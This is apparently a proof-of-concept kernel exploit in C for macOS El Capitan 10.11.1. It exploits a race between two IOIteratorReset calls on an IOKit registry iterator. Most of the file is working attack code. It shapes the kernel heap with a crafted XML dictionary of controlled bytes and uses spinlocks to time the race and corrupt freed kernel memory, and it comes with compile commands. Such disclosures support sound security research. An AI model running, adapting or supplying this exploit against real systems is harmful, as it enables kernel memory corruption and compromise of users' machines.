// ianbeer

// clang -o ioparallel_regreset_exploit ioparallel_regreset_exploit.c -lpthread -framework IOKit
// clang -DIOKIT -o ioparallel_regreset_exploit ioparallel_regreset_exploit.c iokitUser.c -lpthread -framework IOKit
/*

Tested on El Capitan 10.11.1 15b42 on MacBookAir 5,2
*/ 

#include <stdio.h>
#include <stdlib.h>

#include <mach/mach.h>
#include <mach/thread_act.h>

#include <libkern/OSAtomic.h>

#include <pthread.h>
#include <unistd.h>
#include <sys/syscall.h>

#include <IOKit/IOKitLib.h>
#include "iokit.h"

/*
exploit flow:
  1. allocate a registry iterator
  2. get next entry on that iterator enough times to make sure that the backing store of the
     OSOrderedSet doesn't fall in the same allocation bucket as the set itself (try 20 times)
  3. keep exit entry'ing until we're back out and where == start (can just keep making this call)
  4. allocate and free a 0x48 byte heap allocation which we can fill with controlled data
  5. race two calls to reset() and win :)
*/

io_iterator_t iter = MACH_PORT_NULL;

const int times_to_run_iter = 11;
io_object_t objs[times_to_run_iter];

void setup() {
  kern_return_t err;

  // flag is kIORegistryIterateRecursively
  err = IORegistryCreateIterator(kIOMasterPortDefault, kIOServicePlane, 1, &iter);

  if (err != KERN_SUCCESS) {
    printf("can't create reg iterator\n");
    exit(EXIT_FAILURE);
  }
  
  for (int i = 0; i < times_to_run_iter; i++) {
    io_object_t obj = IOIteratorNext(iter);
    if (obj == MACH_PORT_NULL) {
      printf("couldn't run the interator enough times (managed %d)\n", i);
      exit(EXIT_FAILURE);
    }
    objs[i] = obj;
  }

  for (int i = 0; i < times_to_run_iter + 10; i++) {
    IORegistryIteratorExitEntry(iter);
  }
}

void add_controlled_object_to_freelist() {
  mach_port_t master = MACH_PORT_NULL;
  IOMasterPort(MACH_PORT_NULL, &master);
  printf("master port: %x\n", master);

  char* buf = malloc(100000);
  strcpy(buf, "<dict>\n");
  for (int i = 0; i < 2; i++){
    char tmp[256];
    sprintf(tmp, "<key>%c</key>\n", 'a'+i);
    strcat(buf, tmp);
    strcat(buf, "<data format=\"hex\">");
    //for (int j = 0; j < 0x47; j++) {
    //  strcat(buf, "41");
    //}
    for (int j = 0; j < 0x28; j++) {
      strcat(buf, "41");
    }
    strcat(buf, "4141414180ffffff");
    for (int j = 0; j < (0x47-0x30); j++) {
      strcat(buf, "41");
    }
    strcat(buf, "</data>\n");
  }
  strcat(buf, "</dict>");

  printf(buf);

  io_iterator_t i;
  io_service_get_matching_services(master, buf, &i);
}

int start = 0;

OSSpinLock lock_a = OS_SPINLOCK_INIT;
OSSpinLock lock_b = OS_SPINLOCK_INIT;

void wait_n(size_t n) {
  volatile size_t count = n;
  while(count--){;};
}

void go(void* arg){
  //while(start == 0){;}

  OSSpinLockLock(&lock_b);
  OSSpinLockUnlock(&lock_a);
  OSSpinLockLock(&lock_b);

  wait_n(1000);    // fiddle with this to win the race at the right time :)
  IOIteratorReset(iter);
}


int main(int argc, char** argv) {
  setup();


  OSSpinLockLock(&lock_a);
  pthread_t t;
  io_connect_t arg = iter;
  pthread_create(&t, NULL, (void*) go, (void*) &arg);

  OSSpinLockLock(&lock_a);
  add_controlled_object_to_freelist();
  OSSpinLockUnlock(&lock_b);
  
  IOIteratorReset(iter);

  pthread_join(t, NULL);

  return 0;
}
